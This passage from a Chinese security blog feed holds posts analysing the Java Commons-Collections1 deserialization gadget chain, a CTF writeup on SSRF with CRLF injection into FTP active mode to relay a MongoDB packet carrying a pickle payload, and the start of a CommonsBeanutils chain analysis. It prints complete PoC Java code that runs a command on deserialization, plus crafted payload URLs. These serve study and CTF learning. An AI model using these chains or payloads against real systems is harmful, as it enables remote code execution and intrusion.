数组的首位,作为链式调用的起点。</p><p>随便传入一个参数都能调用成功。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210126182108659.png" alt="image-20210126182108659"></p><p>现在我们只需要找到一个类,在反序列化的 readObject 里直接或间接调用了 ChainedTransformer 的 transform 方法即可。</p><h3 id="LazyMap"><a href="#LazyMap" class="headerlink" title="LazyMap"></a>LazyMap</h3><p><strong>ysoserial</strong> 使用的是AnnotationInvocationHandler+LazyMap#get()。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">Map(Proxy).entrySet()</span><br><span class="line">AnnotationInvocationHandler.invoke()</span><br><span class="line">LazyMap.get()</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127102954057.png" alt="image-20210127102954057"></p><p> AnnotationInvocationHandler 类的 readObject 方法中并没有直接调用到 Map 的 get 方法,但是在 AnnotationInvocationHandler#invoke() 方法调用了 get 方法,this.memberValues 可控。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127104206924.png" alt="image-20210127104206924"></p><p>那么如何调用 AnnotationInvocationHandler#invoke() 方法呢?这部分涉及到 java 的动态代理。创建一个 AnnotationInvocationHandler 的代理类,当调用 AnnotationInvocationHandler 的代理类里的任意方法时都会先调用 AnnotationInvocationHandler#invoke() 方法,有点像php里的 _call() 只不过 _call() 在调用不存在的方法才触发。</p><p>所以现在的思路<br>创建一个 LazyMap 对象,设置 factory 为我们构造好的 ChainedTransformer,这样调用LazyMap#ge t()时就会调用 factory.transform() 即 ChainedTransformer.transform()。</p><p>创建一个 AnnotationInvocationHandler 类,设置 this.memberValues 为我们构造的 LazyMap,注意看 AnnotationInvocationHandler 的构造函数,第一个参数必须是注释,否则进不到 if 里赋值</p><p>接着为我们构造好的 AnnotationInvocationHandler 对象创建一个代理,然后只要调用代理后的对象中的任意方法即可出发 AnnotationInvocationHandler#invoke() 方法</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127112129654.png" alt="image-20210127112129654"></p><p>代码:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> org.jboss.weld.manager.Transform;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Repeatable;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections1</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException </span>{</span><br><span class="line"></span><br><span class="line"> Transformer[] transformers = <span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(Class.class),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"forName"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class},</span><br><span class="line"> <span class="keyword">new</span> Object[] {<span class="string">"java.lang.Runtime"</span>}</span><br><span class="line"> ),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"getMethod"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class,Class[].class},</span><br><span class="line"> <span class="keyword">new</span> Object[] {<span class="string">"getRuntime"</span>,<span class="keyword">new</span> Class[<span class="number">0</span>]}</span><br><span class="line"> ),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[] {</span><br><span class="line"> Object.class, Object[].class }, <span class="keyword">new</span> Object[] {</span><br><span class="line"> <span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>] }),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"exec"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class},</span><br><span class="line"> <span class="keyword">new</span> String[]{<span class="string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span>}</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> ChainedTransformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> <span class="comment">//chainedTransformer.transform(1);</span></span><br><span class="line"></span><br><span class="line"> Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line"> Map lazyMap = LazyMap.decorate(innerMap, chainedTransformer);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//实例一个 AnnotationInvocationHandler 类</span></span><br><span class="line"> Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line"> Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"> construct.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> <span class="comment">//这里第一个参数必须是注释类型的 </span></span><br><span class="line"> InvocationHandler handler = (InvocationHandler) construct.newInstance(Repeatable.class, lazyMap);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建 AnnotationInvocationHandler 的代理</span></span><br><span class="line"> Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), <span class="keyword">new</span> Class[] {Map.class}, handler);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//调用代理对象的任意方法</span></span><br><span class="line"> proxyMap.size();</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127112701877.png" alt="image-20210127112701877"></p><p>这里代理对象是转换成了Map 类型,其实换成别的也是一样的</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127121906963.png" alt="image-20210127121906963"></p><p>最后只要随便找一个类,它的 readObject 方法有对我们的代理对象调用任意方法即可,满足这个条件的的类可太多了,<strong>ysoserial</strong> 中继续使用了 AnnotationInvocationHandler 类</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> org.jboss.weld.manager.Transform;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonCollections1</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException </span>{</span><br><span class="line"></span><br><span class="line"> Transformer[] transformers = <span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(Class.class),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"forName"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class},</span><br><span class="line"> <span class="keyword">new</span> Object[] {<span class="string">"java.lang.Runtime"</span>}</span><br><span class="line"> ),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"getMethod"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class,Class[].class},</span><br><span class="line"> <span class="keyword">new</span> Object[] {<span class="string">"getRuntime"</span>,<span class="keyword">new</span> Class[<span class="number">0</span>]}</span><br><span class="line"> ),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[] {</span><br><span class="line"> Object.class, Object[].class }, <span class="keyword">new</span> Object[] {</span><br><span class="line"> <span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>] }),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(</span><br><span class="line"> <span class="string">"exec"</span>,</span><br><span class="line"> <span class="keyword">new</span> Class[] {String.class},</span><br><span class="line"> <span class="keyword">new</span> String[]{<span class="string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span>}</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> ChainedTransformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> <span class="comment">//chainedTransformer.transform(1);</span></span><br><span class="line"></span><br><span class="line"> Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line"> Map lazyMap = LazyMap.decorate(innerMap, chainedTransformer);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//实例一个 AnnotationInvocationHandler 类</span></span><br><span class="line"> Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line"> Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"> construct.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, lazyMap);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建 AnnotationInvocationHandler 的代理</span></span><br><span class="line"> Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), <span class="keyword">new</span> Class[] {Map.class}, handler);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 在实例化一个 AnnotationInvocationHandler 包裹我们的代理对象 proxyMap</span></span><br><span class="line"> handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);</span><br><span class="line"></span><br><span class="line"> ByteArrayOutputStream barr = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line"> ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(barr);</span><br><span class="line"> oos.writeObject(handler);</span><br><span class="line"> oos.close();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> System.out.println(barr);</span><br><span class="line"> ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> ByteArrayInputStream(barr.toByteArray()));</span><br><span class="line"> Object o = (Object)ois.readObject();</span><br><span class="line"></span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>成功弹出计算器</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127142323276.png" alt="image-20210127142323276"></p><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p> 分析完之后还是有很多疑问,最后得到的 poc 我 debug 的时候发现反序列化弹出计算器的过程,并没有按照我们的设想,而是在执行完 AbstractMapDecorator#entrySet()方法后触发的,在 invoke 中打的断点也是在弹出计算器之后才命中。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonCollections1%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210127154823936.png" alt="image-20210127154823936"></p><p>而在 ChainedTransformer#transform() 方法中打的断点根本就没有命中。然后我去看 <strong>ysoserial</strong> 中 CC1 链是如何构造的,发现逻辑是一样的,我们写的 poc 并没有问题。用 P 牛的 demo 也是一样的问题,令人疑惑.jpg</p>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> 反序列化 </tag>
<tag> CommonCollections1 </tag>
</tags>
</entry>
<entry>
<title>SSRF&FTP主动模式</title>
<link href="2021/01/21/SSRF&FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/"/>
<url>2021/01/21/SSRF&FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>上周 *CTF 2021 中碰一题很有意思的 web 题 oh-my-bet 这里记录一下思路。</p><p>题目是 flask 的并且存在 ssrf 漏洞,并且存在 CRLF 注入 CVE-2019-9740<br><a href="https://bugs.python.org/issue36276">https://bugs.python.org/issue36276</a><br> 关键代码<br> content = base64.b64encode(urllib.request.urlopen(path).read())</p><p>内网中存在 ftp 、mongodb、redis 服务,题目明确指出与redis 无关。</p><p>其中 flask 的session 是存在 mongodb的,而flask_session使用的serializer默认是pickle,也就是说只要能将恶意pickle数据塞到mongodb里就可以了就可以触发python反序列化执行任意命令。<br>类似于 P牛这篇文章 <a href="https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html">https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html</a><br>不同的是本题是 mongodb<br>能直接通过 ssrf 向mangodb 写数据吗?搜了很久也没有搜到相关的文章。最后队里的一个师傅说可以通过 ftp 的主动模式去打 mongodb。</p><h2 id="ftp-的主动模式"><a href="#ftp-的主动模式" class="headerlink" title="ftp 的主动模式"></a>ftp 的主动模式</h2><p> 主动模式的FTP工作原理:客户端从一个任意的非特权端口N连接到FTP服务器的命令端口,也就是21端口。然后客 户端开始监听端口N+1,并发送FTP命令“port N+1”到FTP服务器。接着服务器会从它自己的数据端口(20)连接到客户端指定的数据端口(N+1)。</p><p> 简单的说就是客户端随意起一个大于1024端口去连服务器的21端口,然后发送ip 和端口告诉ftp服务器我已经准备好数据连接了,ftp服务器接收到消息后用自己的20端口去连接客户端并发送或者接收数据。<br> 所以在主动模式下我们可以让ftp去指定的ip端口下获取文件数据,将ftp服务器上的文件发送到指定ip端口。</p><p>抓包测试一下,使用主动模式连接 ftp 服务器,登入后输入命令 dir 查看目录<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a39f1d29c916062000000.png"></p><p>数据包:<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a3b78d29c916062000001.png"></p><p>第一部分为登入的流量</p><p>第二部分 客户端的 54003 端口向 ftp服务器 的21 端口发送命令 <code>PORT 192,168,138,1,211,84</code><br>告诉ftp服务器主动向我们指定的 ip 端口建立连接,这里ip端口的格式为Ip的四个部分以<code>,</code> 分割,端口则需要换算成这种格式 port/256, port - 向下取整(port/256)*256</p><pre><code>192,168,138,1,211,84 => 192.168.138.1:54100</code></pre><p>第三部分,客户端的54003端口向 ftp服务器的21端口发送 dir(LIST) 命令,ftp 服务器收到命令请求后将执行结果主动的发到前边制定的<code>192.168.138.1:54100</code></p><p>上传文件和下载文件也是一样的<br>上传文件 客户端向服务端发送 PORT 192,168,138,1,231,165 指定ip端口,接着发送上传文件的请求 <code>STOR /Users/weik1/Data/ftptest/1.txt</code> ,ftp 服务端收到命令后向 192,168,138,1,231,165 建立连接下载数据。 </p><pre><code>220 Microsoft FTP ServiceUSER wEik1331 Password requiredPASS password230 User logged in.PORT 192,168,138,1,231,165200 PORT command successful.STOR /Users/weik1/Data/ftptest/1.txt550 The system cannot find the path specified. </code></pre><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a3fe3d29c916062000003.png"></p><p>下载文件就是ftp 服务器将文件发送到客户端指定的ip端口。</p><h2 id="主动模式在-ssrf-中的利用"><a href="#主动模式在-ssrf-中的利用" class="headerlink" title="主动模式在 ssrf 中的利用"></a>主动模式在 ssrf 中的利用</h2><p>回到题目,需要利用 ftp 的主动模式去打 mongodb 向 mongodb 发起一个 update 请求,修改数据库里的 session 序列化数据。<br>我们将 mongodb 的 update 数据包上传到 ftp 服务器上,再利用ftp 服务器主动模式下载文件的机制将数据包发送到 mongodb 服务器指定的端口下。</p><p>找不到比赛的环境了构建一个简单的dome</p><pre><code>import sysimport urllibimport urllib.errorimport urllib.requesttry: info = urllib.request.urlopen(url).read() print(info)except urllib.error.URLError as e: print(e)</code></pre><p>构造 mongodb 的 update 数据包</p><pre><code>HgEAAHoAAAAAAAAA3QcAAAAAAAABsQAAAGRvY3VtZW50cwCjAAAAB19pZABgAuHfVOiCa1hXwXICaWQALQAAAHNlc3Npb246MTcwYzA2MGUtYTI1OC00MzBkLTgzZDMtMjMxYTI3NDhiYzNwAAV2YWwAOgAAAACAA2Nwb3NpeApzeXN0ZW0KcQBYGgAAAC9yZWFkZmxhZyA+IC90bXAvYWFhYWFhYWFhcQGFcQJScQMuCWV4cGlyYXRpb24A/NHor3cBAAAAAFcAAAACaW5zZXJ0AAkAAABzZXNzaW9ucwAIb3JkZXJlZAABA2xzaWQAHgAAAAVpZAAQAAAABMuWVy4mw045rDMXu79vXg4AAiRkYgAGAAAAYWRtaW4AAA==</code></pre><p>用 nc 将 数据包挂在7777 端口<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600a76f4d29c916062000006.png"></p><p>利用ssrf + CRLF 注入 向ftp 服务器发送命令 </p><pre><code>TYPE A //数据类型为 ASCII码PORT 192,168,138,1,30,97 /指定ip端口 192.168.138.129:7777STOR session //将数据存储为文件 session</code></pre><p>具体的命令<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa66ed29c916062000007.png"></p><p>payload:<br> <a href="ftp://wEik1:password\r\nTYPE">ftp://wEik1:password\r\nTYPE</a> A\r\nPORT 192,168,138,1,30,97\r\nSTOR <a href="mailto:session@192.168.138.129">session@192.168.138.129</a>/</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa7f7d29c916062000009.png"><br>数据包:<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa7e8d29c916062000008.png"></p><p>成功将文件上传到 ftp 服务器</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aa840d29c91606200000a.png"></p><p>接着就是将ftp 服务器上的session 文件 发送到mongodb服务的端口上,这里因为没有环境,直接用nc 监听一下模拟一个mongodb服务。<br>继续监听 7777端口(懒的用别的端口了还得算)<br>向ftp 服务器发送命令 </p><pre><code>PORT 192,168,138,1,30,97 //指定ip端口 192.168.138.1:7777RETR session //发送session 文件也就是将session 文件内容发到 192.168.138.1 的7777端口</code></pre><p>payload:<br> <a href="ftp://wEik1:password\r\nTYPE">ftp://wEik1:password\r\nTYPE</a> A\r\nPORT 192,168,138,1,30,97\r\nRETR <a href="mailto:session@192.168.138.129">session@192.168.138.129</a>/<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa22d29c91606200000c.png"></p><p>数据包:<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa69d29c91606200000d.png"></p><p>成功接收到数据<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/SSRF%26FTP%E4%B8%BB%E5%8A%A8%E6%A8%A1%E5%BC%8F/600aaa15d29c91606200000b.png"></p>]]></content>
<categories>
<category> 奇技淫巧 </category>
</categories>
<tags>
<tag> SSRF </tag>
<tag> FTP </tag>
</tags>
</entry>
<entry>
<title>CommonsBeanutils链分析</title>
<link href="2021/01/18/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90/"/>
<url>2021/01/18/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<p>先看 ysoserial 中 CommonsBeanutils1 这条链的代码</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118140118311.png" alt="image-20210118140118311"></p><p>最后返回的是 <code>PriorityQueue<Object> queue</code> ,看一下 PriorityQueue 这个类的定义。</p><p>PriorityQueue类在Java1.5中引入并作为 <a href="http://www.journaldev.com/1260/java-collections-framework-tutorial">Java Collections Framework</a> 的一部分。PriorityQueue是基于优先堆的一个无界队列,这个优先队列中的元素可以默认自然排序或者通过提供的<a href="http://www.journaldev.com/780/java-comparable-and-comparator-example-to-sort-objects">Comparator</a>(比较器)在队列实例化的时排序。</p><p>简单来说就是 PriorityQueue 会对队列中的元素用比较器 Comparator 进行排序,而 CommonsBeanutils1 中使用的比较器为 BeanComparator。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">final BeanComparator comparator = new BeanComparator("lowestSetBit");</span><br><span class="line">...</span><br><span class="line">Reflections.setFieldValue(comparator, "property", "outputProperties");</span><br></pre></td></tr></table></figure><p><strong><em>这里先放一放</em></strong>,我们看看 PriorityQueue 是如何反序列化的,</p><p>直接看 PriorityQueue#readObject() 方法的代码,前边就是将队列中的对象反序列化,最后会调用 PriorityQueue#heapify() 方法。</p><p><em>java.uti.PriorityQueue.java</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118141333973.png" alt="image-20210118141333973"></p><p>跟进 PriorityQueue#heapify() 方法,这里应该就是排序的代码,遍历队列中的元素传入 PriorityQueue#siftDown() 方法</p><p><em>java.uti.PriorityQueue.java</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118141725380.png" alt="image-20210118141725380"></p><p> PriorityQueue#siftDown()</p><p><em>java.uti.PriorityQueue.java</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118142349991.png" alt="image-20210118142349991"></p><p> PriorityQueue#siftDownUsingComparator()</p><p><em>java.uti.PriorityQueue.java</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118142445779.png" alt="image-20210118142445779"></p><p>一路跟到 PriorityQueue#siftDownUsingComparator() 方法,这里就调用了比较器 comparator 的 compare 方法。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PriorityQueue#readObject() -> PriorityQueue#heapify() -> PriorityQueue#siftDown() -> PriorityQueue#siftDownUsingComparator() -> comparator.compare()</span><br></pre></td></tr></table></figure><p><strong><em>总结一下</em></strong>就是 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法即 comparator.compare() 去处理。</p><p>而之前说到 CommonsBeanutils1 链中使用的比较器为 BeanComparator。我们来看 BeanComparator 中的 compare() 方法。</p><p>BeanComparator#compare()</p><p><em>org.apache.commons.beanutils.BeanComparator.class</em></p><p><img src="" 